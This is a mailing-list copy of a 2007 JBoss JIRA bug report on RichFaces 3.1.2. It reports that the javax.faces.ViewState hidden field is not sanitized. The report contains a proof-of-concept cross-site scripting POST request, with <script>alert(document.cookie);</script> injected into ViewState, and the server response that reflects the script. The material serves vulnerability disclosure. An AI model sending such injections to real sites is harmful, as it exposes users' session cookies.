[richfaces-issues] [JBoss JIRA] Updated: (RF-1518) hidden field javax.faces.ViewState is not sanitized
Tomoharu Fujita (JIRA)
jira-events at lists.jboss.org
Wed Dec 5 03:17:52 EST 2007
[ http://jira.jboss.com/jira/browse/RF-1518?page=all ]
Tomoharu Fujita updated RF-1518:
--------------------------------
Description:
Here is the sample facelets page in my application that produces the symptom.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:f="http://java.sun.com/jsf/core"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:a4j="http://richfaces.org/a4j"
xmlns:rich="http://richfaces.org/rich"
xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title></title>
</head>
<body>
<f:view>
<h:form>
<rich:panel header="Simple Echo">
<h:inputText size="20" value="#{startupBean.command}" >
<a4j:support event="onkeyup" reRender="ruleTest" action="#{startupBean.doApprove}"/>
</h:inputText>
<h:outputText value="#{startupBean.result}" id="ruleTest"/>
</rich:panel>
</h:form>
</f:view>
</body>
</html>
The fist time rendered output like following,
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body>
</html>
When the javax.faces.ViewState hidden param injection made a Post Request like below
AJAXREQUEST=_viewRoot&j_id2=j_id2&j_id2%3Aj_id4=hello&javax.faces.ViewState=_id2"<script>alert(document.cookie);</script>&j_id2%3Aj_id5=j_id2%3Aj_id5&
rendered response is
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /><script type="text/javascript">//<![CDATA[
alert(document.cookie);
//]]>
</script>" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body></html>
I'm not sure it's jsf-ri issue or richfaces, but if javax.faces.STATE_SAVING_METHOD set to client,
I couldn't reproduce the same issue.
was:
Here is the sample facelets page in my application that produces the symptom.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:f="http://java.sun.com/jsf/core"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:a4j="http://richfaces.org/a4j"
xmlns:rich="http://richfaces.org/rich"
xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title></title>
</head>
<body>
<f:view>
<h:form>
<rich:panel header="Simple Echo">
<h:inputText size="20" value="#{startupBean.command}" >
<a4j:support event="onkeyup" reRender="ruleTest" action="#{startupBean.doApprove}"/>
</h:inputText>
<h:outputText value="#{startupBean.result}" id="ruleTest"/>
</rich:panel>
</h:form>
</f:view>
</body>
</html>
The fist time rendered output like following,
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body>
</html>
When the javax.faces.ViewState hidden param injection made like this Post Request
AJAXREQUEST=_viewRoot&j_id2=j_id2&j_id2%3Aj_id4=hello&javax.faces.ViewState=_id2"<script>alert(document.cookie);</script>&j_id2%3Aj_id5=j_id2%3Aj_id5&
rendered response is
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml"><head><title></title>
<link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" />
<script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script>
</head>
<body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /><script type="text/javascript">//<![CDATA[
alert(document.cookie);
//]]>
</script>" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body></html>
But I'm not sure it's jsf-ri issue or richfaces.
> hidden field javax.faces.ViewState is not sanitized
> ---------------------------------------------------
>
> Key: RF-1518
> URL: http://jira.jboss.com/jira/browse/RF-1518
> Project: RichFaces
> Issue Type: Bug
> Affects Versions: 3.1.2
> Environment: jsf-ri 1.2_06-b02-FCS, facelets 1.1.13, RichFaces 3.1.2SP1, WindowsXP(x86_64)
> Reporter: Tomoharu Fujita
>
> Here is the sample facelets page in my application that produces the symptom.
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE html
> PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
> <html xmlns:f="http://java.sun.com/jsf/core"
> xmlns:h="http://java.sun.com/jsf/html"
> xmlns:ui="http://java.sun.com/jsf/facelets"
> xmlns:a4j="http://richfaces.org/a4j"
> xmlns:rich="http://richfaces.org/rich"
> xmlns="http://www.w3.org/1999/xhtml" >
> <head>
> <title></title>
> </head>
> <body>
> <f:view>
> <h:form>
> <rich:panel header="Simple Echo">
> <h:inputText size="20" value="#{startupBean.command}" >
> <a4j:support event="onkeyup" reRender="ruleTest" action="#{startupBean.doApprove}"/>
> </h:inputText>
> <h:outputText value="#{startupBean.result}" id="ruleTest"/>
> </rich:panel>
> </h:form>
> </f:view>
> </body>
> </html>
> The fist time rendered output like following,
> <?xml version="1.0"?>
> <html xmlns="http://www.w3.org/1999/xhtml">
> <head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
> </script></head>
> <body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body>
> </html>
> When the javax.faces.ViewState hidden param injection made a Post Request like below
> AJAXREQUEST=_viewRoot&j_id2=j_id2&j_id2%3Aj_id4=hello&javax.faces.ViewState=_id2"<script>alert(document.cookie);</script>&j_id2%3Aj_id5=j_id2%3Aj_id5&
> rendered response is
> <?xml version="1.0"?>
> <html xmlns="http://www.w3.org/1999/xhtml">
> <head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
> </script></head>
> <body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /><script type="text/javascript">//<![CDATA[
> alert(document.cookie);
> //]]>
> </script>" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body></html>
> I'm not sure it's jsf-ri issue or richfaces, but if javax.faces.STATE_SAVING_METHOD set to client,
> I couldn't reproduce the same issue.
--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: http://jira.jboss.com/jira/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira
More information about the richfaces-issues
mailing list